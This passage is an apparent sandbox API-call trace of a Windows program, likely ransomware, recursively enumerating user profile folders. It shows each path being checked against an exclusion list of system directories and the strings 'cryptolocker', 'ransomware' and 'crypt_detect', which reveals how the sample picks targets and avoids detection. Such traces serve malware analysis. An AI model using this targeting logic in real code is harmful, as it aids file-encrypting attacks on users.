cAlternateFileName="MICROS~1")) returned 0 [0119.144] FindClose (in: hFindFile=0xec1df0 | out: hFindFile=0xec1df0) returned 1 [0119.145] GetProcessHeap () returned 0xe30000 [0119.145] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.145] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0119.145] FindClose (in: hFindFile=0xec1b30 | out: hFindFile=0xec1b30) returned 1 [0119.145] GetProcessHeap () returned 0xe30000 [0119.145] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.145] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0119.145] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0119.145] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0119.145] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0119.145] StrCmpW (psz1="Cookies", psz2=".") returned 1 [0119.145] StrCmpW (psz1="Cookies", psz2="..") returned 1 [0119.145] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0119.145] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0119.145] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0119.145] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.145] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.145] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Desktop", cchMax=1058 | out: psz1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0119.145] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="crypt_detect") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="cryptolocker") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="ransomware") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.146] StrStrIW (lpFirst="C:\\Users\\Default\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0119.174] GetProcessHeap () returned 0xe30000 [0119.174] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xef3600 [0119.174] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Desktop", cchMax=1074 | out: psz1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0119.174] StrNCatW (in: psz1="C:\\Users\\Default\\Desktop", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Default\\Desktop\\*") returned="C:\\Users\\Default\\Desktop\\*" [0119.174] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.175] StrCmpW (psz1=".", psz2=".") returned 0 [0119.175] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.175] StrCmpW (psz1="..", psz2=".") returned 1 [0119.175] StrCmpW (psz1="..", psz2="..") returned 0 [0119.175] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.175] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.175] GetProcessHeap () returned 0xe30000 [0119.175] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.175] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0119.175] StrCmpW (psz1="Documents", psz2=".") returned 1 [0119.175] StrCmpW (psz1="Documents", psz2="..") returned 1 [0119.175] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.175] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.175] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Documents", cchMax=1058 | out: psz1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0119.175] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0119.175] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.175] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0119.175] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.175] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.175] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0119.175] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\boot\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="crypt_detect") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="cryptolocker") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="ransomware") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.176] StrStrIW (lpFirst="C:\\Users\\Default\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0119.176] GetProcessHeap () returned 0xe30000 [0119.176] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xef3600 [0119.176] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Documents", cchMax=1078 | out: psz1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0119.176] StrNCatW (in: psz1="C:\\Users\\Default\\Documents", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Documents\\*") returned="C:\\Users\\Default\\Documents\\*" [0119.176] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.177] StrCmpW (psz1=".", psz2=".") returned 0 [0119.177] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.178] StrCmpW (psz1="..", psz2=".") returned 1 [0119.178] StrCmpW (psz1="..", psz2="..") returned 0 [0119.178] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0119.178] StrCmpW (psz1="My Music", psz2=".") returned 1 [0119.178] StrCmpW (psz1="My Music", psz2="..") returned 1 [0119.178] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0119.178] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0119.178] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0119.178] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0119.178] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0119.178] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0119.178] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0119.178] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.179] GetProcessHeap () returned 0xe30000 [0119.179] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.179] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0119.179] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0119.179] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0119.179] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.179] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.179] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Downloads", cchMax=1058 | out: psz1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="crypt_detect") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="cryptolocker") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="ransomware") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.179] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0119.179] GetProcessHeap () returned 0xe30000 [0119.179] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xef3600 [0119.180] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Downloads", cchMax=1078 | out: psz1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0119.180] StrNCatW (in: psz1="C:\\Users\\Default\\Downloads", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Downloads\\*") returned="C:\\Users\\Default\\Downloads\\*" [0119.180] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.180] StrCmpW (psz1=".", psz2=".") returned 0 [0119.180] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.180] StrCmpW (psz1="..", psz2=".") returned 1 [0119.180] StrCmpW (psz1="..", psz2="..") returned 0 [0119.180] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.180] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.180] GetProcessHeap () returned 0xe30000 [0119.180] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.180] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0119.180] StrCmpW (psz1="Favorites", psz2=".") returned 1 [0119.180] StrCmpW (psz1="Favorites", psz2="..") returned 1 [0119.180] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.180] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.180] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Favorites", cchMax=1058 | out: psz1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0119.180] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\windows\\system32\\") returned 0x0 [0119.180] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.180] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\windows\\system\\") returned 0x0 [0119.180] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\appdata\\local\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\boot\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\perflogs\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\programdata\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\drivers\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\wsus\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="crypt_detect") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="cryptolocker") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="ransomware") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="C:\\WINDOWS") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.181] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="C:\\Program Files") returned 0x0 [0119.181] GetProcessHeap () returned 0xe30000 [0119.181] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xef3600 [0119.181] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Favorites", cchMax=1078 | out: psz1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0119.181] StrNCatW (in: psz1="C:\\Users\\Default\\Favorites", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Favorites\\*") returned="C:\\Users\\Default\\Favorites\\*" [0119.181] FindFirstFileW (in: 